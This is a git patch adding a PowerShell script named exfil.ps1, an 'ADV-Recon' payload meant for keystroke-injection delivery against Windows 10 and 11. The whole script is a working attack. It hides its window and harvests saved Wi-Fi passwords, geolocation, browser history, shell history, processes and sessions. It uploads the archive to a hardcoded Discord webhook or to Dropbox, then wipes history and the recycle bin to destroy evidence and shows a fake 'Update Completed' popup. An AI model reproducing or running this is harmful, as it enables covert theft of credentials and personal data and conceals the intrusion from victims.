From 4d04294803b5fef9b0e6cc253fd8cfce8cfd767a Mon Sep 17 00:00:00 2001 From: Didier Asechimann Date: Tue, 21 Oct 2025 18:30:19 -0400 Subject: [PATCH] Upload New File --- PS1/exfil.ps1 | 594 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 594 insertions(+) create mode 100644 PS1/exfil.ps1 diff --git a/PS1/exfil.ps1 b/PS1/exfil.ps1 new file mode 100644 index 0000000..3c0d620 --- /dev/null +++ b/PS1/exfil.ps1 @@ -0,0 +1,594 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This is an advanced recon of a target PC and exfiltration of that data. +.DESCRIPTION + This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running. + All of the gather information is formatted neatly and output to a file. + That file is then exfiltrated to cloud storage via Dropbox. +.Link + https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads + https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads + https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads +#> + +############################################################################################################################################################ + +$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);'; +add-type -name win -member $i -namespace native; +[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0); + + +# MAKE LOOT FOLDER, FILE, and ZIP + +$FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)" + +$FileName = "$FolderName.txt" + +$ZIP = "$FolderName.zip" + +New-Item -Path $env:tmp/$FolderName -ItemType Directory + +############################################################################################################################################################ + +# Enter your access tokens below. At least one has to be provided but both can be used at the same time. + +#$db = "" + +$dc = "https://discord.com/api/webhooks/1419793734245285888/QAmMrxeNTFbjIA1eridj0yn7IElDu_8WfUKOvSAHjNutTIpVd8ZXJ2Tnxm2PlyeBKOMq" + +############################################################################################################################################################ + +# Recon all User Directories +tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt + +# Powershell history +Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt + +############################################################################################################################################################ + +function Get-fullName { + + try { + $fullName = (Get-LocalUser -Name $env:USERNAME).FullName + } + + # If no name is detected function will return $env:UserName + + # Write Error is just for troubleshooting + catch {Write-Error "No name was detected" + return $env:UserName + -ErrorAction SilentlyContinue + } + + return $fullName + +} + +$fullName = Get-fullName + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Get-email { + + try { + + $email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName + return $email + } + +# If no email is detected function will return backup message for sapi speak + + # Write Error is just for troubleshooting + catch {Write-Error "An email was not found" + return "No Email Detected" + -ErrorAction SilentlyContinue + } +} + +$email = Get-email + + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Get-GeoLocation{ + try { + Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace + $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object + $GeoWatcher.Start() #Begin resolving current locaton + + while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { + Start-Sleep -Milliseconds 100 #Wait for discovery. + } + + if ($GeoWatcher.Permission -eq 'Denied'){ + Write-Error 'Access Denied for Location Information' + } else { + $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. + } + } + # Write Error is just for troubleshooting + catch {Write-Error "No coordinates found" + return "No Coordinates found" + -ErrorAction SilentlyContinue + } + +} + +$GeoLocation = Get-GeoLocation + +$GeoLocation = $GeoLocation -split " " + +$Lat = $GeoLocation[0].Substring(11) -replace ".$" + +$Lon = $GeoLocation[1].Substring(10) -replace ".$" + +############################################################################################################################################################ + +# local-user + +$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID | Out-String + +############################################################################################################################################################ + +Function Get-RegistryValue($key, $value) { (Get-ItemProperty $key $value).$value } + +$Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" +$ConsentPromptBehaviorAdmin_Name = "ConsentPromptBehaviorAdmin" +$PromptOnSecureDesktop_Name = "PromptOnSecureDesktop" + +$ConsentPromptBehaviorAdmin_Value = Get-RegistryValue $Key $ConsentPromptBehaviorAdmin_Name +$PromptOnSecureDesktop_Value = Get-RegistryValue $Key $PromptOnSecureDesktop_Name + +If($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "Never notIfy" } + +ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "NotIfy me only when apps try to make changes to my computer(do not dim my desktop)" } + +ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "NotIfy me only when apps try to make changes to my computer(default)" } + +ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "Always notIfy" } + +Else{ $UAC = "Unknown" } + +############################################################################################################################################################ + +$lsass = Get-Process -Name "lsass" + +if ($lsass.ProtectedProcess) {$lsass = "LSASS is running as a protected process."} + +else {$lsass = "LSASS is not running as a protected process."} + +############################################################################################################################################################ + +$StartUp = (Get-ChildItem -Path ([Environment]::GetFolderPath("Startup"))).Name + +############################################################################################################################################################ + +# Get nearby wifi networks + +try +{ +$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim() +} +catch +{ +$NearbyWifi="No nearby wifi networks detected" +} + +############################################################################################################################################################ + +# Get info about pc + +# Get IP / Network Info + +try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content} +catch{$computerPubIP="Error getting Public IP"} + +try{$localIP = Get-NetIPAddress -InterfaceAlias "*Ethernet*","*Wi-Fi*" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String} +catch{$localIP = "Error getting local IP"} + +$MAC = Get-NetAdapter -Name "*Ethernet*","*Wi-Fi*"| Select Name, MacAddress, Status | Out-String + +# Check RDP + +if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { + $RDP = "RDP is Enabled" +} else { + $RDP = "RDP is NOT enabled" +} + +############################################################################################################################################################ + +#Get System Info +$computerSystem = Get-CimInstance CIM_ComputerSystem + +$computerName = $computerSystem.Name + +$computerModel = $computerSystem.Model + +$computerManufacturer = $computerSystem.Manufacturer + +$computerBIOS = Get-CimInstance CIM_BIOSElement | Out-String + +$computerOs=(Get-WMIObject win32_operatingsystem) | Select Caption, Version | Out-String + +$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List | Out-String + +$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List | Out-String + +$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} | Out-String + +$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table | Out-String + +############################################################################################################################################################ + +$ScheduledTasks = Get-ScheduledTask + +############################################################################################################################################################ + +$klist = klist sessions + +############################################################################################################################################################ + +$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 50 FullName, LastWriteTime + +############################################################################################################################################################ + +# Get HDDs +$driveType = @{ + 2="Removable disk " + 3="Fixed local disk " + 4="Network disk " + 5="Compact disk "} +$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } | Out-String + +#Get - Com & Serial Devices +$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table | Out-String -width 250 + +############################################################################################################################################################ + +# Get Network Interfaces +$NetworkAdapters = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress | Out-String -width 250 + +$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String + +############################################################################################################################################################ + +# process first +$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine | Out-String -width 250 + +# Get Listeners / ActiveTcpConnections +$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess +$listener = $listener | foreach-object { + $listenerItem = $_ + $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess }) + new-object PSObject -property @{ + "LocalAddress" = $listenerItem.LocalAddress + "RemoteAddress" = $listenerItem.RemoteAddress + "State" = $listenerItem.State + "AppliedSetting" = $listenerItem.AppliedSetting + "OwningProcess" = $listenerItem.OwningProcess + "ProcessName" = $processItem.ProcessName + } +} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table | Out-String -width 250 + +# service +$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName | Out-String -width 250 + +# installed software (get uninstaller) +$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize | Out-String -width 250 + +# drivers +$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion | Out-String -width 250 + +# videocard +$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution | Out-String -width 250 + + +############################################################################################################################################################ + +# OUTPUTS RESULTS TO LOOT FILE + +$output = @" + +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _' | | '_ ' _ \ _ | | / _' | | |/ / / _ \ | '_ \ | | | |# 'Y8888888Y' # +# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# 'Y888Y' # +# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# 'Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| ('\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(' ') ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + + +Full Name: $fullName + +Email: $email + +GeoLocation: +Latitude: $Lat +Longitude: $Lon + +------------------------------------------------------------------------------------------------------------------------------ + +Local Users: +$luser + +------------------------------------------------------------------------------------------------------------------------------ + +UAC State: +$UAC + +LSASS State: +$lsass + +RDP State: +$RDP + +------------------------------------------------------------------------------------------------------------------------------ + +Public IP: +$computerPubIP + +Local IPs: +$localIP + +MAC: +$MAC + +------------------------------------------------------------------------------------------------------------------------------ + +Computer Name: +$computerName + +Model: +$computerModel + +Manufacturer: +$computerManufacturer + +BIOS: +$computerBIOS + +OS: +$computerOs + +CPU: +$computerCpu + +Mainboard: +$computerMainboard + +Ram Capacity: +$computerRamCapacity + +Total installed Ram: +$computerRam + +Video Card: +$videocard + +------------------------------------------------------------------------------------------------------------------------------ + +Contents of Start Up Folder: +$StartUp + +------------------------------------------------------------------------------------------------------------------------------ + +Scheduled Tasks: +$ScheduledTasks + +------------------------------------------------------------------------------------------------------------------------------ + +Logon Sessions: +$klist + +------------------------------------------------------------------------------------------------------------------------------ + +Recent Files: +$RecentFiles + +------------------------------------------------------------------------------------------------------------------------------ + +Hard-Drives: +$Hdds + +COM Devices: +$COMDevices + +------------------------------------------------------------------------------------------------------------------------------ + +Network Adapters: +$NetworkAdapters + +------------------------------------------------------------------------------------------------------------------------------ + +Nearby Wifi: +$NearbyWifi + +Wifi Profiles: +$wifiProfiles + +------------------------------------------------------------------------------------------------------------------------------ + +Process: +$process + +------------------------------------------------------------------------------------------------------------------------------ + +Listeners: +$listener + +------------------------------------------------------------------------------------------------------------------------------ + +Services: +$service + +------------------------------------------------------------------------------------------------------------------------------ + +Installed Software: +$software + +------------------------------------------------------------------------------------------------------------------------------ + +Drivers: +$drivers + +------------------------------------------------------------------------------------------------------------------------------ + +"@ + +$output > $env:TEMP\$FolderName/computerData.txt + +############################################################################################################################################################ + +function Get-BrowserData { + + [CmdletBinding()] + param ( + [Parameter (Position=1,Mandatory = $True)] + [string]$Browser, + [Parameter (Position=1,Mandatory = $True)] + [string]$DataType + ) + + $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' + + if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"} + elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"} + elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"} + elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"} + elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"} + + + $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique + $Value | ForEach-Object { + $Key = $_ + if ($Key -match $Search){ + New-Object -TypeName PSObject -Property @{ + User = $env:UserName + Browser = $Browser + DataType = $DataType + Data = $_ + } + } + } +} + +Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt + +Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt + +Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt + +Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt + +Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt + +############################################################################################################################################################ + +Compress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP + +# Upload output file to dropbox + +function dropbox { +$TargetFilePath="/$ZIP" +$SourceFilePath="$env:TEMP\$ZIP" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $db +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +if (-not ([string]::IsNullOrEmpty($db))){dropbox} + +############################################################################################################################################################ + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +} + +if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"} + + + +############################################################################################################################################################ + +<# +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + + +############################################################################################################################################################ + +# Popup message to signal the payload is done + +$done = New-Object -ComObject Wscript.Shell;$done.Popup("Update Completed",1) +exit